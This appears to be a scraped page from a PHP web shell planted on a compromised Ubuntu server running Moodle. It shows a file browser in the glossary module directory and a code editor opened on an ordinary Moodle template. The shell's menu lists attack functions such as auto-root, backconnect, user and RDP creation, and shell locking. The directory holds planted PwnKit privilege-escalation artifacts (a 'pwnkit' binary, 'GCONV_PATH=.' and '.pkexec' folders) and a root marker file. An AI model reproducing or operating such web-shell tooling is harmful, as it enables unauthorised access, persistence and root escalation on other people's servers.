Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
mod /
glossary /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxrwxr-x
classes
[ DIR ]
drwxrwxr-x
db
[ DIR ]
drwxrwxr-x
formats
[ DIR ]
drwxrwxr-x
lang
[ DIR ]
drwxrwxr-x
pix
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
README.txt
1.7
KB
-rw-rw-r--
TODO.txt
607
B
-rw-rw-r--
approve.php
2.22
KB
-rw-rw-r--
deleteentry.php
5.77
KB
-rw-rw-r--
edit.php
4.03
KB
-rw-rw-r--
edit_form.php
6.73
KB
-rw-rw-r--
editcategories.html
1.67
KB
-rw-rw-r--
editcategories.php
10.89
KB
-rw-rw-r--
export.php
2.62
KB
-rw-rw-r--
exportentry.php
4.36
KB
-rw-rw-r--
formats.php
9.5
KB
-rw-rw-r--
import.php
15.35
KB
-rw-rw-r--
import_form.php
1.13
KB
-rw-rw-r--
index.php
4.34
KB
-rw-rw-r--
lib.php
156.72
KB
-rw-rw-r--
locallib.php
28.9
KB
-rw-rw-r--
mod_form.php
10.56
KB
-rw-rw-r--
print.php
6.89
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
rsslib.php
7.79
KB
-rw-rw-r--
settings.php
3.82
KB
-rw-rw-r--
showentry.php
3.12
KB
-rw-rw-r--
showentry_ajax.php
3.77
KB
-rw-rw-r--
sql.php
3.83
KB
-rw-rw-r--
styles.css
2.5
KB
-rw-rw-r--
tabs.php
3.86
KB
-rw-rw-r--
upgrade.txt
867
B
-rw-rw-r--
version.php
1.2
KB
-rw-rw-r--
view.php
19.3
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : editcategories.html
<?php global $CFG; require_once("../../config.php"); ?> <div class="boxaligncenter"> <form id="form" method="post" action="editcategories.php"> <div> <table class="generalbox" cellpadding="5"> <tr valign="top"> <td align="right"><label for="name"><?php echo get_string("name") ?>:</label></td> <td> <input type="text" name="name" id="name" size="30" value="<?php p($name) ?>" /> </td> </tr> <tr valign="top"> <td align="right"><label for="usedynalink"><?php echo get_string("linkcategory","glossary") ?>:</label></td> <td> <select size="1" id="usedynalink" name="usedynalink"> <option value="1" <?php if ( $usedynalink ) { echo "selected=\"selected\""; } ?>><?php echo get_string("yes") ?></option> <option value="0" <?php if ( !$usedynalink ) { echo "selected=\"selected\""; } ?>><?php echo get_string("no") ?> </option> </select> <?php echo $OUTPUT->help_icon('linkcategory', 'glossary') ?> </td> </tr> <tr> <td colspan="2"> <div class="buttons"> <input type="hidden" name="sesskey" value="<?php echo sesskey(); ?>" /> <input type="hidden" name="id" value="<?php p($cm->id) ?>" /> <input type="hidden" name="action" value="<?php p($action) ?>" /> <input type="hidden" name="confirm" value="1" /> <input type="hidden" name="mode" value='cat' /> <input type="hidden" name="hook" value="<?php p($hook) ?>" /> <input type="submit" value="<?php print_string("savechanges") ?>" /> <input type="reset" value="<?php print_string("back","glossary") ?>" onclick="javascript:history.go(-1);" /> </div> </td> </tr> </table> </div> </form> </div>
Close